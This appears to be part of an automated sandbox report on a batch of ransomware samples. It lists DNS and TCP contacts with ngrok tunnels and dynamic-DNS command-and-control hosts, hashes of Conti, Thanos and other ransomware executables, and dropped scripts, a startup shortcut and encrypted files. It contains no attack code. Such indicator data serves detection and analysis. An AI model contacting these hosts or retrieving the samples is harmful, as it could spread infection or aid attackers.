| US | 8.8.8.8:53 | 166.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 148.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aammkk12345.kro.kr | udp |
| KR | 180.69.229.168:5552 | aammkk12345.kro.kr | tcp |
| RU | 176.111.174.254:56328 | tcp | |
| US | 8.8.8.8:53 | 235.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.tcp.ngrok.io | udp |
| US | 8.8.8.8:53 | 236.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.0.127.10.in-addr.arpa | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 165.0.127.10.in-addr.arpa | udp |
| US | 13.58.157.220:10093 | 8.tcp.ngrok.io | tcp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 164.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.0.127.10.in-addr.arpa | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 159.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 152.0.127.10.in-addr.arpa | udp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | securebiz.org | udp |
| US | 8.8.8.8:53 | astdg.top | udp |
| US | 8.8.8.8:53 | 176.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bobrat1111.ddns.net | udp |
| US | 8.8.8.8:53 | ibram.zapto.org | udp |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| US | 8.8.8.8:53 | flestriche.xyz | udp |
| US | 8.8.8.8:53 | 172.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 181.0.127.10.in-addr.arpa | udp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 13.58.157.220:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3hjfk33o.23s.ps1
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Blocker.gen-0531fa8add852becdab7c5235a9de90de117c0c6b06dcbcc58a397538e968f96.exe
| MD5 | 9d02de8e771827f73c26a3d669e579d7 |
| SHA1 | 4a8cdec5afa86832bafd59f17812896b47c4464f |
| SHA256 | 0531fa8add852becdab7c5235a9de90de117c0c6b06dcbcc58a397538e968f96 |
| SHA512 | daa07f74ab83c2c6bd183b679aa5cd9e055985f402bae968ee422cab4a056cad0a5b7ae5e30f65846eb041711f203751b809f75efc35cdd46920275a55787dc6 |
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Encoder.gen-4066d357b55fb66801389baf183151f514a74093f933750966557652f748aedb.exe
| MD5 | 97e242c9bc7eaff55e3e0e40c2c530b8 |
| SHA1 | f47f8064e0a619557970fdbf4b4958255bab7d62 |
| SHA256 | 4066d357b55fb66801389baf183151f514a74093f933750966557652f748aedb |
| SHA512 | c4834c1c256a1b1331cb00b49397f2a217e206c6de41fbb484bf3f4714aeb1a32c927a8019a68a32d3a7ba35cccdd59bdb4a93ed13bd0110d93e07fffcb5ffca |
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Encoder.gen-880823dd9df0ca6047cd829a1031e8a167ccec0629fdeac40a097dd555debf7c.exe
| MD5 | 711486a19e8b011528dee34a5d25776e |
| SHA1 | 7e131940fce4d157d0a338b8285e8e2298e8677d |
| SHA256 | 880823dd9df0ca6047cd829a1031e8a167ccec0629fdeac40a097dd555debf7c |
| SHA512 | 9213dc1b1ab70e6672e6bef43a50125e7752de303ddbdbfc5b395f3b228363dd57c036befb21c83945207954575b90021af0d4e1f6872253c20475f3dbc4e894 |
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-3cb05ab0775975ad282e45b9b01a702c0896fa9ab1ac1e1c136ecfaf40fb7a6f.exe
| MD5 | a77d1c0a395df82450985f142f9ae383 |
| SHA1 | 3562481619eae9ab3e4e2a353a7a134178bd62e3 |
| SHA256 | 3cb05ab0775975ad282e45b9b01a702c0896fa9ab1ac1e1c136ecfaf40fb7a6f |
| SHA512 | 681b87c6412fa7e08afeaaec43cbdc8d42a7adc1ff0b5bbe7758803b590f7c44efcd19eb0b2582b1f563585f7dc1c3e9c01b0bd28da11abe578579bc72b4d50b |
memory/4244-210-0x0000000000810000-0x0000000000838000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-b6e7072f1cafe3fc7ddc0e2dbb1e40b997b3824d606572ead26c33fefb20f153.exe
| MD5 | 101b558457868065952e67ed8db39e07 |
| SHA1 | dd1e73f1d4539abf7f70c6cae16d8466093cf99b |
| SHA256 | b6e7072f1cafe3fc7ddc0e2dbb1e40b997b3824d606572ead26c33fefb20f153 |
| SHA512 | 9e09d15a18c6d7ef8e4fbd754da3830ca6fa4f6ece1ed28594fa63622ad0fb66f80a2c45ad9f777a9d8b1680cf7a8c1266a3bf3963fd1f6a725b046c4140287f |
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-c00db1eba5ba7fcd234c6a568ff9ae60bb3f343da199d0db8cd9b11308603a4d.exe
| MD5 | 164651e3f142e4aec14ea0716a217064 |
| SHA1 | 63b608ba0c59407c312a83ee788392c99bc13642 |
| SHA256 | c00db1eba5ba7fcd234c6a568ff9ae60bb3f343da199d0db8cd9b11308603a4d |
| SHA512 | 6bef7221251a851b35c12c3f0c50d5d8412601e97f49a273e5da1b62dcf70d0841d864e625ee01b89f0b69866be7ab3b3f65f3ef577a97297de04f4bd035fe20 |
memory/1092-217-0x0000000000630000-0x000000000064C000-memory.dmp
memory/1932-219-0x0000000000860000-0x0000000000898000-memory.dmp
memory/3668-220-0x0000000000B30000-0x0000000000BFA000-memory.dmp
memory/888-221-0x000000001B490000-0x000000001B95E000-memory.dmp
memory/1092-224-0x00000000053F0000-0x0000000005994000-memory.dmp
memory/888-227-0x000000001BAD0000-0x000000001BB32000-memory.dmp
memory/1092-225-0x0000000004F00000-0x0000000004F92000-memory.dmp
memory/888-223-0x000000001B960000-0x000000001BA06000-memory.dmp
memory/3668-222-0x0000000005470000-0x00000000054D6000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-c432a01904467c55ef316fec2973f10e09f1a1053faf574683c5097174caaa38.exe
| MD5 | 1ccef1fb6b247ffd5d2aae2106d4ed7b |
| SHA1 | 3d8a1ed377a331561a69dad902104a6e016332d9 |
| SHA256 | c432a01904467c55ef316fec2973f10e09f1a1053faf574683c5097174caaa38 |
| SHA512 | ddb4cfb41a45c9782be248bcbaafb4943a6b7a7d2845acec910d809db9a4e440939944212d43247d81edc88d7e79faef47a041f840d9496343fedf30dfc4146d |
memory/4664-263-0x0000000000040000-0x000000000007E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RSW.exe
| MD5 | d39dea43665c9fc80ad6b12c0a21d011 |
| SHA1 | 1691d0ca2bde1b5184dce9a7c52a0663f9bebac3 |
| SHA256 | 95a6b94edd616dbafd9f307b35e794be2392f9fdf40e69940f60ad181492ce3c |
| SHA512 | 69554e79382a3705e0e83709a7c2302943c5880f4bb817f11baca6250fc91e189f06201be3e6484110ad2fb4de27bf2ea1bef40bff4104f839e646ca150f4fb8 |
memory/4664-265-0x0000000004940000-0x000000000494A000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
| MD5 | 6da3c7796bca2f47f11e8711a945cf1d |
| SHA1 | e65df27b70ba3206d216a49b43f6beb2095cfe1b |
| SHA256 | d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131 |
| SHA512 | 6f76e6f2ac37ae6bef73e5bc9e8b0e1f5dc6240fa7bbba8ab4cf99fbe8cb697c39d9a25add2128936f061a667e72b5f45f3da3b9151af84b5982d707e207bcee |
memory/4464-272-0x000000001BAC0000-0x000000001BB5C000-memory.dmp
memory/3936-271-0x0000000000760000-0x0000000000782000-memory.dmp
memory/4464-273-0x0000000000870000-0x0000000000878000-memory.dmp
memory/4464-274-0x000000001BD20000-0x000000001BD6C000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Blocker.gen-a267e0d83b4ece8957283582de37e53a2d0d66938a29ca621592f5ccf0b416a8.exe
| MD5 | 2264ada61405b71a4463920c1a421f30 |
| SHA1 | c3831def50c14cf2f2bd8213e0746eeadbf5e8c0 |
| SHA256 | a267e0d83b4ece8957283582de37e53a2d0d66938a29ca621592f5ccf0b416a8 |
| SHA512 | b9b849d491f21dbf8493ad0a3e106be90188a9d9032c5766e7f77382525f5742cad108b08382ef74feb6109897ffe6793de9e1758a206227b51bbad0fc361e9e |
memory/3668-280-0x0000000006070000-0x000000000608E000-memory.dmp
memory/3668-281-0x00000000061D0000-0x0000000006280000-memory.dmp
C:\Users\Admin\Desktop\AssertSave.rle
| MD5 | 3017c4844e7a528d147642ff4b1736d1 |
| SHA1 | 4f7459feeb1b794ec741597687ed5ee924c0882e |
| SHA256 | 4388bd9d5ffa64ac5afbd79df2248633ac1205011c1dda7bf6127c4092f5c954 |
| SHA512 | 5e9a5e06c4c8588dae2568012bd07422b685fe60d00c9bcc69e225a5a0da25386856a8c43508252ea29d038ab689291fbf384930ab00b72ffcdf84b877d1608b |
C:\Users\Admin\AppData\Local\Temp\desktop.vbs
| MD5 | 9799504fa700bdad9f993cca7072cc22 |
| SHA1 | 2a421ddd72956493c8260a04e9b3498597aef182 |
| SHA256 | 332c867c272d155f4757d178323bf7b22cad57e488f438f71262753464e2a4a3 |
| SHA512 | 20d6f19db1a0ca2b8bf080d005c5088f6697ffa93b510b164c4f1245490d1a85de8e65e6d4dd6245c4e93ce72a46f910f2d67f547540cc46e87d7beac508e64c |
\??\c:\users\admin\desktop\00460\heur-trojan-ransom.win32.blocker.gen-adf56d5514f9ff609943983010d3fc67ac0b29d5f92ac9adc25bafba79bad88a.exe
| MD5 | f0b68ddc0bef98205b22b8bccec05436 |
| SHA1 | 87a8ca516fbbb6a34bb8f4dd5a6f3930b64e90c9 |
| SHA256 | adf56d5514f9ff609943983010d3fc67ac0b29d5f92ac9adc25bafba79bad88a |
| SHA512 | 4b052079bcded8571e589cf945430fd0607fa7a2d97d066ee1c60f96787abb2517e6c85ea87f61f2936fdd1e016d7a00a8ba0a5d552d2f13e9808bc2e6a30e7c |
C:\Users\Admin\AppData\Local\Temp\task.vbs
| MD5 | c1226b6e0bc40a68fc81ac6c9c358073 |
| SHA1 | e915af4192de7b84f0cf7f5137807c9e559621d6 |
| SHA256 | 2d335606cfd8568f833c016e3f9f9c7fc8a36f0e99d72b40568cfcf0d6e2d1e3 |
| SHA512 | a1dac61ca1b8ece1295071f84bfb1c992ed3c1753c6c93c8f07dacebdc05193e9b161d38c67f26aea4a4ea8e5cd5dd9a8de1731c932706839c216274b6b6fa4c |
C:\Users\Admin\AppData\Local\Temp\windowdefender.vbs
| MD5 | fda44de30fe9eb60c6f62da36be484a6 |
| SHA1 | d413ba9d18dd5d81e1ce2c038fe91a51db1ac5f6 |
| SHA256 | 311a3392f28bf0e5bf83ac74b28fd7d435bf514fda3e69fb1d5a4c05029e28e8 |
| SHA512 | 29aa29beb18f91a1edcb10fbfc43bc76be632c4cde05b09505da182d14440cc19f9c03855080d7b80dc54bf2e210cc096fde0e80071251898f47b288d737ce34 |
memory/852-295-0x0000000000400000-0x0000000002D02000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Conti.gen-53b1c1b2f41a7fc300e97d036e57539453ff82001dd3f6abf07f4896b1f9ca22.exe
| MD5 | 290c7dfb01e50cea9e19da81a781af2c |
| SHA1 | 8a52c7645ec8fd6c217dfe5491461372acc4e849 |
| SHA256 | 53b1c1b2f41a7fc300e97d036e57539453ff82001dd3f6abf07f4896b1f9ca22 |
| SHA512 | be2f45b5cc110bc9c4e61723eb111e53d70f3e32757915a9a945589a5296e3a667afdf5978f7002869005f961d705058ffafd2076d44471b7826237c76e11d4d |
C:\Users\Admin\AppData\Local\Temp\t.vbs
| MD5 | c578d9653b22800c3eb6b6a51219bbb8 |
| SHA1 | a97aa251901bbe179a48dbc7a0c1872e163b1f2d |
| SHA256 | 20a98a7e6e137bb1b9bd5ef6911a479cb8eac925b80d6db4e70b19f62a40cce2 |
| SHA512 | 3ae6dc8f02d1a78e1235a0782b632972da5a74ab32287cc41aa672d4fa4a9d34bb5fc50eba07b6915f2e61c402927cd5f6feeb7f7602afa2f64e91efb3b7fc4d |
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
| MD5 | 17a2564bda8ec94004266e90ae620937 |
| SHA1 | 84910b1d8c306f4b4b2eacbd74c3e13d37768130 |
| SHA256 | f9788ca182b0754299da35e1619675df74b431814b67241854f8b30fc563d0fa |
| SHA512 | d1be86d15424dbc2963509a9b0d812d026336d15333840697dce782427bfd4fae2a73b24940532786cf603c1df96faa95d14dd5ec34bc1558f591e0c5ff38ddb |
C:\Users\Admin\AppData\Local\Temp\preventchangedesktop.bat
| MD5 | e2217bd35f0d452be424c37c1c11a9d1 |
| SHA1 | d77aa3c2e85aaed7978bcac806fea74f6caf7dd6 |
| SHA256 | 47aff42728af2299f903de8bbf36c8bfa8839df26c9d05044af7060ea230dc1d |
| SHA512 | a6da0f27540f6b863b52ce9e2a96461207b74a311ced0def141622a6ec17a62e301e0db6a00a7f1f05af7948f7b8f6a3fde2792df4ec856dee9283d664db93db |
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Convagent.gen-e139a350242af220a379940c1a667891161ff92bdcdbb5acd024076a27ddbf56.exe
| MD5 | 898f0ec3d9588199aa00da724447b5bb |
| SHA1 | 0a5a6aa8a1e8fb83b71516d9086d899836410ba2 |
| SHA256 | e139a350242af220a379940c1a667891161ff92bdcdbb5acd024076a27ddbf56 |
| SHA512 | ff309a380ec33837425f4eaf64de9dbdf1f2446024e93a2ca67bc3b5749c8f417be82e1043858cd45a614d14b3d84fb67537457067e6fb95154dae0271d6fb09 |
memory/3632-314-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\Desktop\AssertSave.rle.MALWAREDEVELOPER
| MD5 | c522458aa08c0d731a2792f2e41a6174 |
| SHA1 | 7f09ebdd4bfc859b48b80a6087c957104dbbc98f |
| SHA256 | 4a48f7350e13850539b6d56bb2b18e0310f459816ff6196e7a47a6af1581e748 |
| SHA512 | d63cc8cd117337d8386e9b3906553ed4ceacd6f4ee5e9fb70db3c82c85b60ebb70b4d100ef049bd1b73989c4f035e0f531156c74223560693e9abf0b443b84aa |
memory/3176-321-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4264-325-0x0000000000400000-0x00000000007CE000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c1c40c13de318e8fa290dbb71c1b69be489b0d86abe65a39130e19d5b3eab28b.exe
| MD5 | 1581f5103a83713f50316c7c36d7aae1 |
| SHA1 | 0a1f93e33ae9a9b63aa691bc5e9256f8c3bc1e03 |
| SHA256 | c1c40c13de318e8fa290dbb71c1b69be489b0d86abe65a39130e19d5b3eab28b |
| SHA512 | 020426dbe9c9458cd58fa08e8dccafa84bedf9c8299006e5d017f6dd434cd1410c8392065dee4d67012a7b02e159bb383fae181cceb93b37ec55c3d247741f26 |
memory/4072-329-0x0000000000400000-0x00000000005BB000-memory.dmp
memory/2560-330-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4264-323-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/3368-333-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe
| MD5 | c5dd4df325b14e58cf851e0bcb617953 |
| SHA1 | fc47da7c0c4d7d26f300ac70b44748d47eafe960 |
| SHA256 | e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0 |
| SHA512 | d6f32e64e5d169823a8f2f7e60f7c6ac24cc274c5ed3eba5767f6150566fb9d0f371c0c6f1167eea70e00333b609883b2d383009bb901962d4b69aa2c9a641c9 |
memory/2188-339-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\Desktop\CompareAssert.vst.MALWAREDEVELOPER
| MD5 | 17a7c1c82c8b8bbff5db13bbc03121f7 |
| SHA1 | b8d0547b59de2450b302712a8dd8f12ece6f9aeb |
| SHA256 | 79233c8200d3807b66a12dd3d2607e79017aa21054404b2c1a74793bfd53c815 |
| SHA512 | b749148cb5db7f5ef07c08a487e8f9de3f14422e76875fec733df47c08e1d5df1b1ae2f60bfc0b0552a8a9df146680956de3d4e260463dc757602e48107bb78a |
C:\Program Files\7-Zip\7-zip.chm.exe
| MD5 | efe04bc27f7ea8378da4bcbd23a209aa |
| SHA1 | 84035c3532a0d198eb400ac40b8600dd54f362a9 |
| SHA256 | 39634ed473ffe7e278db78fd68c01e99a78723d17cbac188bfbef01f2c4d5ac2 |
| SHA512 | ba5936d902192a832e07df5349709b194050e6720b56903dbe40ef99f2d81d5a55f8f95c4ff1d0e78ebf989720eef6d839dbeef5f1b23194149ed8a22bb1f385 |
memory/3860-348-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4264-353-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/2344-354-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4264-361-0x0000000070B30000-0x0000000070B69000-memory.dmp
memory/2120-369-0x0000000000400000-0x0000000000943000-memory.dmp
memory/4264-370-0x0000000070B90000-0x0000000070BC9000-memory.dmp
memory/4264-368-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/2944-374-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4264-362-0x0000000000400000-0x00000000007CE000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba.exe
| MD5 | 2f2d4eb24662c916f822f9c3fd55c9b2 |
| SHA1 | 9d5bda347f70b8f928803a28782a1018d9f2d0e0 |
| SHA256 | 4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba |
| SHA512 | 1cc68736ac883a60f1113f183fa68b344b86dffc6b3853dbabbc626eb02fd69b9eb3801891c07193ab3684419e7346d4a1d0c37a5de6523df0dabae1b0051bb5 |
memory/3612-383-0x0000000000400000-0x000000000044B000-memory.dmp
memory/3612-382-0x0000000000400000-0x000000000044B000-memory.dmp
memory/3612-379-0x0000000000400000-0x000000000044B000-memory.dmp
memory/3612-378-0x0000000000400000-0x000000000044B000-memory.dmp
memory/5412-399-0x0000000000720000-0x0000000000721000-memory.dmp
memory/5412-400-0x00000000007E0000-0x00000000007E1000-memory.dmp
memory/3612-398-0x0000000010480000-0x00000000104F0000-memory.dmp
memory/5164-397-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3612-393-0x0000000010410000-0x0000000010480000-memory.dmp
memory/3612-377-0x0000000000400000-0x000000000044B000-memory.dmp
memory/3612-376-0x0000000000400000-0x000000000044B000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-82a55487bd1c3b53eb0f0bee7483cae09792605e323b1df4b234582d21366d39.exe
| MD5 | 402cbc09109fbe9492924da0a07d43cf |
| SHA1 | 6d1f1f99d07317ba3be2ac84130e3ad9a891f8b4 |
| SHA256 | 82a55487bd1c3b53eb0f0bee7483cae09792605e323b1df4b234582d21366d39 |
| SHA512 | d59c9c68bd4b5306d6c8bd46a7691e3f071c999ac2f33196f4f76d291b88522a536480df279574e1854541ec3b96d644fdbe720b76c40889c2d075d0d033fad0 |
memory/5596-415-0x0000000000390000-0x000000000044E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reload1.lnk
| MD5 | 704f0ad39b0caa3cb618bea36fee6bd2 |
| SHA1 | 82486a7c523afd4dccacc82ed7208283ec844f0f |
| SHA256 | 4ed13f35691b22ae04540575917580930055a19c8dcc2d2dcc0f8a6429be6cdb |
| SHA512 | e2406f3beee62e9475b85f9e47f7b4e29f801f065a68627ccdc78a02d10c644f10a1292c408c466635d240f5e4855470014210492641b39610b26a19f43d3438 |
memory/4264-520-0x0000000070200000-0x0000000070239000-memory.dmp
memory/4072-546-0x0000000000400000-0x00000000005BB000-memory.dmp
memory/5492-550-0x00000000008E0000-0x0000000000A0C000-memory.dmp
C:\Recovery\readme.txt
| MD5 | a48d7f2cbc55c406561016d717163111 |
